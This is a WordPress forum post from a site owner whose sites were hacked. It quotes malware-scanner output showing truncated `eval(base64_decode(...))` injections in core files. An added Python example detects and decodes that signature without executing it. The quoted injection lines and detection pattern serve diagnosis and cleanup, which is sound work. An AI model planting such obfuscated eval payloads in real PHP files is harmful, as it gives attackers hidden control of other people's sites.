• jakilevy

    (@jakilevy)


    Hello –

    I have several sites that have been hacked. Some were running 3.2.1, while others were already running 3.3.1. As recommended by @janeforshort, I thought posting my trials here would be helpful not only to me, but to the community at large.

    At the moment, all sites have been upgraded to 3.3.1.

    For the purposes of dealing with 1 site at a time, I’ll start with the domain networkedcollab (dot) org/mashup – if you get a security warning when visiting, please don’t proceed (I don’t want your computer to get malware on my account).

    be warned ??

    The message I eventually get is that my site “contains content from iedla63wyers.rr.nu”
    [ screenshot : https://skitch.com/jakilevy/8gpew/screen-shot-2012-03-01-at-3.18.57-pm ]

    As mentioned above, I’ve already gone through and deleted the old WordPress files and upgraded to 3.3.1.

    When I tried to log in to the WP dashboard, it looked totally messed up –
    [ screenshot : https://skitch.com/jakilevy/8gcwd/dashboard-mashup-culture-wordpress ]

    I’ve already notified the host (Dreamhost) about this issue and already reset all my passwords (ftp and wp).

    I then installed the plugin “Exploit Scanner” as recommended by Boone Gorges (thanks @boone!), but got the scary red malware warning screen, so instead had to upload it via FTP.

    I got a list of files to delete (which includes some theme files I’m actually using). However, I’m being told that the following files have bad code in them. Should I delete these files?

    This is what “Exploit Scanner” tells me:

    wp-rdf.php:1
    Often used to execute malicious code
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z
    wp-rdf.php:1
    Used by malicious scripts to decode previously obscured data/programs
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaX
    wp-rss2.php:1
    Often used to execute malicious code
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z
    wp-rss2.php:1
    Used by malicious scripts to decode previously obscured data/programs
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaX
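An added example, not part of this post and not code from the Exploit Scanner plugin: a small Python scanner that flags the `eval(base64_decode("..."))` signature reported above in PHP sources, reports the file and line, and decodes the base64 payload for inspection without ever executing it. The file contents below are constructed for the example; the only page-derived value is the truncated base64 fragment quoted in the scanner output, so the decoder is written to tolerate a cut-off string (it pads it and drops a dangling character that cannot form a byte).

```python
import base64
import re
from typing import Dict, List

# Signature of the injection the scanner reported: eval(base64_decode("...")).
# The group captures the base64 text up to the closing quote, or to the end of
# the line when the excerpt has been truncated.
INJECT_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]*)', re.IGNORECASE
)


def decode_lenient(b64: str) -> str:
    """Decode base64 that may be cut short (scanner excerpts truncate it).

    Strips any padding, discards a dangling sextet that cannot form a byte,
    re-pads to a multiple of four, and decodes as latin-1 so arbitrary bytes
    never raise. The payload is only decoded, never evaluated.
    """
    s = b64.rstrip("=")
    if len(s) % 4 == 1:
        s = s[:-1]
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("latin-1")


def scan_php_source(filename: str, source: str) -> List[Dict[str, object]]:
    """Return one finding per eval(base64_decode(...)) occurrence in a PHP source.

    Each finding carries the line number and the decoded (possibly partial)
    payload so a reviewer can see what the obfuscated code starts with.
    """
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in INJECT_RE.finditer(line):
            payload = m.group(1)
            findings.append({
                "file": filename,
                "line": lineno,
                "b64_length": len(payload),
                "decoded": decode_lenient(payload),
            })
    return findings


def scan_tree(files: Dict[str, str]) -> Dict[str, List[Dict[str, object]]]:
    """Scan a mapping of path -> source text and keep only files with findings."""
    result: Dict[str, List[Dict[str, object]]] = {}
    for path, src in files.items():
        hits = scan_php_source(path, src)
        if hits:
            result[path] = hits
    return result


# Constructed sample inputs (not real files from the site). The base64 text is
# the truncated fragment quoted in the post's Exploit Scanner output; the
# injected line sits at line 1, ahead of the file's own opening tag, as the
# scanner reported.
INJECTED_FRAGMENT = "aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaX"
SAMPLE_FILES = {
    "wp-rdf.php": '<?php /**/ eval(base64_decode("' + INJECTED_FRAGMENT
                  + '\n<?php\n// constructed: legitimate file body follows\n',
    "wp-rss2.php": '<?php /**/ eval(base64_decode("' + INJECTED_FRAGMENT
                   + '\n<?php\n',
    "wp-load.php": "<?php\n// constructed clean file: no eval/base64_decode\n"
                   "require_once 'wp-config.php';\n",
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_FILES).items():
        for h in hits:
            print(f"{path}:{h['line']} eval(base64_decode) payload -> {h['decoded']!r}")
```

Run against a real tree by reading each `.php` file into the mapping; the decoded prefix tells you whether a hit is the same injected dropper in every file (the fragment quoted in this post decodes to the start of an `if(function_exists('ob_start')...` check), which is the usual sign that every flagged core file can be replaced wholesale from a fresh WordPress download rather than edited by hand.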
  • The topic ‘Hacked by iedla63wyers.rr.nu’ is closed to new replies.